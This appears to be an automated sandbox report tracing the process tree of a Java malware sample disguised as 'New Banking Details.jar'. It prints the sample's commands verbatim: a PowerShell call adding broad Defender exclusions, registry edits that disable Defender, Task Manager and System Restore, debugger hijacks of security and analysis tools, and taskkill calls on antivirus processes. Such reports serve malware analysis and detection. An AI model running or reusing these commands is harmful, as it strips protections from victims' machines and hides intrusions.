PID 3100 wrote to memory of 4292	3100	cmd.exe	356
PID 3100 wrote to memory of 4292	3100	cmd.exe	356
PID 504 wrote to memory of 4464	504	java.exe	357
PID 504 wrote to memory of 4464	504	java.exe	357
PID 4464 wrote to memory of 3948	4464	cmd.exe	359
PID 4464 wrote to memory of 3948	4464	cmd.exe	359
PID 4464 wrote to memory of 3088	4464	cmd.exe	360
PID 4464 wrote to memory of 3088	4464	cmd.exe	360
PID 504 wrote to memory of 1820	504	java.exe	361
PID 504 wrote to memory of 1820	504	java.exe	361
PID 504 wrote to memory of 4348	504	java.exe	363
PID 504 wrote to memory of 4348	504	java.exe	363
PID 4348 wrote to memory of 4668	4348	cmd.exe	365
PID 4348 wrote to memory of 4668	4348	cmd.exe	365
PID 4348 wrote to memory of 4340	4348	cmd.exe	366
PID 4348 wrote to memory of 4340	4348	cmd.exe	366
PID 504 wrote to memory of 4400	504	java.exe	367
PID 504 wrote to memory of 4400	504	java.exe	367
PID 4400 wrote to memory of 4928	4400	cmd.exe	369
PID 4400 wrote to memory of 4928	4400	cmd.exe	369
PID 4400 wrote to memory of 1976	4400	cmd.exe	370
PID 4400 wrote to memory of 1976	4400	cmd.exe	370
PID 504 wrote to memory of 3960	504	java.exe	371
PID 504 wrote to memory of 3960	504	java.exe	371
PID 3960 wrote to memory of 4920	3960	cmd.exe	373
PID 3960 wrote to memory of 4920	3960	cmd.exe	373
PID 3960 wrote to memory of 4392	3960	cmd.exe	374
PID 3960 wrote to memory of 4392	3960	cmd.exe	374
PID 504 wrote to memory of 4376	504	java.exe	375
PID 504 wrote to memory of 4376	504	java.exe	375
PID 504 wrote to memory of 1020	504	java.exe	377
PID 504 wrote to memory of 1020	504	java.exe	377
PID 504 wrote to memory of 1464	504	java.exe	379
PID 504 wrote to memory of 1464	504	java.exe	379
PID 504 wrote to memory of 4572	504	java.exe	381
PID 504 wrote to memory of 4572	504	java.exe	381
PID 504 wrote to memory of 4752	504	java.exe	383
PID 504 wrote to memory of 4752	504	java.exe	383
PID 504 wrote to memory of 4916	504	java.exe	385
PID 504 wrote to memory of 4916	504	java.exe	385
PID 504 wrote to memory of 4024	504	java.exe	387
PID 504 wrote to memory of 4024	504	java.exe	387
PID 504 wrote to memory of 3552	504	java.exe	389
PID 504 wrote to memory of 3552	504	java.exe	389

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1064	attrib.exe
1152	attrib.exe
1376	attrib.exe
1476	attrib.exe
3540	attrib.exe
3688	attrib.exe
3172	attrib.exe
4076	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\New Banking Details.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:504
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3560
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1864
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:572
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3140
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:3688
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:3172
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\hmJMe\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:4076
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\hmJMe\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1064
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\hmJMe
  2⤵
  - Views/modifies file attributes
  PID:1152
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\hmJMe
  2⤵
  - Views/modifies file attributes
  PID:1376
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\hmJMe
  2⤵
  - Views/modifies file attributes
  PID:1476
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\hmJMe\Lwqbj.class
  2⤵
  - Views/modifies file attributes
  PID:3540
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:3264
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:4440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hmJMe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hmJMe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2684
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3620
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1268
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:60
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3044
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:3776
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1492
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:572
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2604
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:1440
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3564
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1120
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4260
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:4284
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4364
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:4404
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4488
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:4500
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4528
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:4600
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4640
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4724
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4740
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4824
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:4832
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:4976
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4988
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:4144
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:4448
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:3836
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1400
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3144
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1140
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4268
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3892
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4112
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4208
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4312
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:4668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:4284
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4624
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:4760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:4484
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:4492
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:4512
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:4640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:4764
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4596
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:5100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:4740
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4744
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:5016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:4832
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:4024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:2364
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:5060
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:5052
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:3748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:1400
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4120
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4180
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:4272
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:928
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1140
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:3688
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:3628
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:3948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:4008
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:3088
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:3736
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:4268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:3620
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4800
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4144
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:4564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:4788
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:4400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:4716
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4460
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:4040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:1780
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:1332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4364
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:4600
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4848
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4740
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:4920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4924
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5028
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:4240
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:4220
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:4024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:5108
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:2604
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:2128
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4164
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:3580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:4296
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4216
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:4188
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4344
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4276
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:3948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4416
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1152
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:3620
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3848
